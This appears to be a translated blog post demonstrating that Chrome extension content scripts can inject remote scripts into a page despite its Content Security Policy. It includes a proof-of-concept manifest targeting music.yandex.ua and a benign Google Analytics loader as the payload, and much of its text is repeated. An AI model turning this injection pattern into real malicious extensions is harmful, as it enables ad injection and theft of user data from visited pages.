CSP bypass using Google Chrome extensions
Not so long ago, I set up on my CSP ( content security policy ) project, and decided that life was a success. After all, now it is impossible to load scripts from forbidden resources, and even about trying to do this, I will be notified of the corresponding error. And if someone uploads the script, it will still not be able to send anything, because ajax requests are sent only to my servers.
So I thought, and was calm for a while.
I also used the HTTP Headers extension, which helped me view the server response headers in a convenient way. One day, I saw an advertisement on my resources that was never there. After reviewing the code a bit and experimenting, I realized that it was this extension that added advertising to all the sites I visit. The extension code, unfortunately, I did not copy on time, and at the moment it has already been removed from the extension store with the note “contains malicious software”. From this and start my story.
It became very interesting to me how it is, because I have clear rules for the browser about the policy of downloading scripts and sending data from my page, and here I see that the security settings well, very little increase the security of users if they use browser extensions (in This is specifically Google Chrome). Therefore, I decided to recreate such an extension that could load scripts from a remote server bypassing the CSP.
')
Writing browser extensions is not very difficult, there have been many articles about this, in particular from Google , so I will not dwell on the actual writing of the extension.
As an example, the Yandex Music site was chosen for several reasons:
Putting together a malicious extension (you can see the finished version on GitHub ):
Carefully reviewing where Yandex allows you to download scripts
I decided that Google analytics is clearly not enough on this list, so I choose https://google-analytics.com/analytics.js as a malicious downloadable script, especially since many people call Google a “good corporation”. This choice is due to the following criteria:
This is another bonus, because I can use the loaded script to simulate requests without raising my server and additional code (of course, Google analyst will not let you see the collected information if I am not the site owner, but I didn’t want to collect any information, just a demonstration of blocking bypass).
I take the standard script from the manual, only the number of the counter is made up from the head:
To begin with, I try to execute this script from the console to check if the CSP works on this site at all, and I see the following:
Now I will try to add all the same to the extension, and here, everything works. The script was successfully added to the page without generating a single error.
Yes, many will say that the choice of extensions is a personal matter for everyone, and Google more or less quickly blocked the extension (within a week from the moment I myself realized that it spammed me with advertising).
On the other hand, it is not clear how much it was malicious. I will explain why it was malicious: advertisements of doubtful products were added, with links to even more questionable sites, and, unfortunately, I don’t know if the extension collected any data on the pages I visited, and if so, which ones by the same success, they could collect information from forms or simply from the pages I visited.
My opinion is that if a resource tells the browser a policy of behavior with the page received, then this policy should be absolute, and apply to everything, including extensions, but what do you think?
So I thought, and was calm for a while.
I also used the HTTP Headers extension, which helped me view the server response headers in a convenient way. One day, I saw an advertisement on my resources that was never there. After reviewing the code a bit and experimenting, I realized that it was this extension that added advertising to all the sites I visit. The extension code, unfortunately, I did not copy on time, and at the moment it has already been removed from the extension store with the note “contains malicious software”. From this and start my story.
It became very interesting to me how it is, because I have clear rules for the browser about the policy of downloading scripts and sending data from my page, and here I see that the security settings well, very little increase the security of users if they use browser extensions (in This is specifically Google Chrome). Therefore, I decided to recreate such an extension that could load scripts from a remote server bypassing the CSP.
')
Writing browser extensions is not very difficult, there have been many articles about this, in particular from Google , so I will not dwell on the actual writing of the extension.
As an example, the Yandex Music site was chosen for several reasons:
- They have a CSP
- They have enough powerful servers to withstand all the “who are interested to see”;
- They have not fully configured CSP (at the time of writing this article, they have a content security policy report report only, so I can see all the error messages about incorrect content, but the blocking itself will not occur)
Putting together a malicious extension (you can see the finished version on GitHub ):
1. The manifest.json file
{ "manifest_version": 2, "name": "CSP vulnerability", "description": "This is just an example, please do not use it.", "version": "1.0", "browser_action": { "default_icon": "evil.png", "default_popup": "popup.html" }, "content_scripts": [ { "matches": [ "https://music.yandex.ua/*" ], "js": [ "evil.js" ], "run_at": "document_end" } ], "permissions": [ "activeTab", "https://music.yandex.ua/*" ] } 2. Create a malicious script itself.
Carefully reviewing where Yandex allows you to download scripts
"script-src 'self' 'unsafe-eval' vk.com cdn.pushwoosh.com yandex.ua yandex.st yandex.net yastatic.net yandexadexchange.net *.yandex.ru *.yandex.ua *.yandex.net *.yastatic.net *.yandexadexchange.net *.yandex-team.ru . I decided that Google analytics is clearly not enough on this list, so I choose https://google-analytics.com/analytics.js as a malicious downloadable script, especially since many people call Google a “good corporation”. This choice is due to the following criteria:
- The connected script does not harm anyone.
- It definitely works.
- He will try to make ajax requests.
- Anyone who wants to can connect it.
This is another bonus, because I can use the loaded script to simulate requests without raising my server and additional code (of course, Google analyst will not let you see the collected information if I am not the site owner, but I didn’t want to collect any information, just a demonstration of blocking bypass).
I take the standard script from the manual, only the number of the counter is made up from the head:
(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r].l = 1 * new Date(); a = s.createElement(o), m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m) })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga'); ga('create', 'UA-00000000-0', 'auto'); ga('send', 'pageview'); To begin with, I try to execute this script from the console to check if the CSP works on this site at all, and I see the following:
VM636:10 [Report Only] Refused to load the script 'https://www.google-analytics.com/analytics.js' because it violates the following Content Security Policy directive: "script-src 'self' 'unsafe-eval' vk.com cdn.pushwoosh.com yandex.ua yandex.st yandex.net yastatic.net yandexadexchange.net *.yandex.ru *.yandex.ua *.yandex.net *.yastatic.net *.yandexadexchange.net *.yandex-team.ru 'nonce-dWVmJGgsauDNxkDyep5LEg=='". Now I will try to add all the same to the extension, and here, everything works. The script was successfully added to the page without generating a single error.
findings
Yes, many will say that the choice of extensions is a personal matter for everyone, and Google more or less quickly blocked the extension (within a week from the moment I myself realized that it spammed me with advertising).
On the other hand, it is not clear how much it was malicious. I will explain why it was malicious: advertisements of doubtful products were added, with links to even more questionable sites, and, unfortunately, I don’t know if the extension collected any data on the pages I visited, and if so, which ones by the same success, they could collect information from forms or simply from the pages I visited.
My opinion is that if a resource tells the browser a policy of behavior with the page received, then this policy should be absolute, and apply to everything, including extensions, but what do you think?
Source: https://habr.com/ru/post/315608/
All Articles